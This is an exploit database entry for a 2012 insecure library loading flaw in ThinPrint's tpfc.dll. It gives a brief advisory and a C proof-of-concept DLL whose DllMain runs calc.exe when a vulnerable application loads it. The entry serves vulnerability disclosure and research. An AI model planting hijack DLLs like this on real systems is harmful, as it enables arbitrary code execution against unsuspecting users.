ThinPrint - tpfc.dll Insecure Library Loading Arbitrary Code Execution

2012-09-04T00:00:00
ID EXPLOITPACK:D9E953A533EBBFCBB83233F6494CFD97
Type exploitpack
Reporter Moshe Zioni
Modified 2012-09-04T00:00:00

Description

ThinPrint - tpfc.dll Insecure Library Loading Arbitrary Code Execution

                                        
                                            // source: https://www.securityfocus.com/bid/55421/info

ThinPrint is prone to a vulnerability that lets attackers execute arbitrary code.

Exploiting this issue allows local attackers to execute arbitrary code with the privileges of the user running the affected application. 

#include <windows.h> 

	int hijack_poc () 
	{ 
	  WinExec ( "calc.exe" , SW_NORMAL );
	  return 0 ; 
	} 
	  
	BOOL WINAPI DllMain 
		 (	HINSTANCE hinstDLL , 
			DWORD dwReason ,
			LPVOID lpvReserved ) 
	{ 
	  hijack_poc () ;
	  return 0 ;
	}